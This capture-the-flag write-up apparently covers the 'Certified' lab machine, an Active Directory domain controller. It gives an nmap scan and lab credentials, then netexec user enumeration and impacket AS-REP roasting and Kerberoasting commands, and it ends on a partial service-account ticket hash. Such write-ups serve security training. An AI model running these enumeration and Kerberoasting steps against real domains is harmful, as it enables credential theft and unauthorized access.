Certified

First nmap

# Nmap 7.95 scan initiated Wed Dec 17 22:51:50 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -v -oN ./nmap/nmap.txt 10.129.231.186
Nmap scan report for 10.129.231.186
Host is up (0.24s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-17 22:52:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:05:29
| Not valid after: 2105-05-23T21:05:29
| MD5: ac8a:4187:4d19:237f:7cfa:de61:b5b2:941f
|_SHA-1: 85f1:ada4:c000:4cd3:13de:d1c2:f3c6:58f7:7134:d397
|_ssl-date: 2025-12-17T22:53:52+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-12-17T22:53:51+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:05:29
| Not valid after: 2105-05-23T21:05:29
| MD5: ac8a:4187:4d19:237f:7cfa:de61:b5b2:941f
|_SHA-1: 85f1:ada4:c000:4cd3:13de:d1c2:f3c6:58f7:7134:d397
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:05:29
| Not valid after: 2105-05-23T21:05:29
| MD5: ac8a:4187:4d19:237f:7cfa:de61:b5b2:941f
|_SHA-1: 85f1:ada4:c000:4cd3:13de:d1c2:f3c6:58f7:7134:d397
|_ssl-date: 2025-12-17T22:53:53+00:00; +7h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-12-17T22:53:51+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:05:29
| Not valid after: 2105-05-23T21:05:29
| MD5: ac8a:4187:4d19:237f:7cfa:de61:b5b2:941f
|_SHA-1: 85f1:ada4:c000:4cd3:13de:d1c2:f3c6:58f7:7134:d397
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-12-17T22:53:14
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 17 22:53:53 2025 -- 1 IP address (1 host up) scanned in 122.19 seconds

Next: "As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09". Based on this, we proceed with enumeration.

netexec smb $target -u 'judith.mader' -p 'judith09' --users | awk '{print $5}' | fgrep -v '[*]' | tee users.txt

impacket-GetNPUsers certified.htb/ -dc-ip $target -usersfile users.txt -outputfile hashes.txt -> nothing

impacket-GetUserSPNs certified.htb/ -dc-ip $target -usersfile users.txt -outputfile hashes.txt -> has something. Error due to the wrong timezone

Host script results:
| smb2-time:
| date: 2025-12-17T23:27:01
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

-> sudo date -s "+7 hours 29 minutes 20 seconds"

If there is no "-", it is "+". After adjusting the clock, we obtain the hash
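As an added example (not part of the original write-up), this Python code reads the clock-skew line from the nmap output above, converts it to signed seconds, checks it against the default 5-minute Kerberos clock tolerance in Active Directory, and builds a relative offset for `date -s`. The function names are hypothetical and the second sample line is constructed.

```python
import re

# Default AD Kerberos policy: maximum tolerance for clock synchronization is 5 minutes.
KERBEROS_TOLERANCE_S = 300

# nmap durations look like 7h00m00s, -1m30s, 6s, optionally with a day part.
_DURATION = re.compile(r"^([+-]?)(?:(\d+)d)?(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?$")

def parse_skew(text):
    """Convert an nmap duration to signed seconds (target clock minus local clock)."""
    m = _DURATION.match(text.strip())
    if not m or not any(m.groups()[1:]):
        raise ValueError(f"not an nmap duration: {text!r}")
    sign, d, h, mi, s = m.groups()
    total = int(d or 0) * 86400 + int(h or 0) * 3600 + int(mi or 0) * 60 + int(s or 0)
    # No sign means the target is ahead of the scanner, i.e. a positive offset.
    return -total if sign == "-" else total

def extract_skew(nmap_output):
    """Return the skew in seconds from the first clock-skew line, or None if absent."""
    for line in nmap_output.splitlines():
        if "clock-skew:" not in line:
            continue
        value = line.split("clock-skew:", 1)[1]
        # Multi-sample form 'mean: X, deviation: Y, median: Z': prefer the median.
        median = re.search(r"median:\s*([+-]?\w+)", value)
        return parse_skew(median.group(1) if median else value)
    return None

def exceeds_tolerance(skew_s, tolerance_s=KERBEROS_TOLERANCE_S):
    """True when Kerberos requests would be rejected for clock skew."""
    return abs(skew_s) > tolerance_s

def date_offset(skew_s):
    """Signed relative offset to pass to `date -s`, expressed in seconds."""
    return f"{skew_s:+d} seconds"

# Line taken from the scan output on this page.
PAGE_SAMPLE = "|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s"
# Constructed line: target 90 seconds behind the scanner (within tolerance).
CONSTRUCTED_SAMPLE = "|_clock-skew: -1m30s"

if __name__ == "__main__":
    for sample in (PAGE_SAMPLE, CONSTRUCTED_SAMPLE):
        skew = extract_skew(sample)
        print(skew, exceeds_tolerance(skew), date_offset(skew))
```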

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- -------------- ------------------------------------------ -------------------------- --------- ----------
certified.htb/management_svc.DC01 management_svc CN=Management,CN=Users,DC=certified,DC=htb 2024-05-13 22:30:51.476756 <never>



[-] CCache file is not found. Skipping...
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$cbfe9a7d7331beb78ead85c5b300f4ff$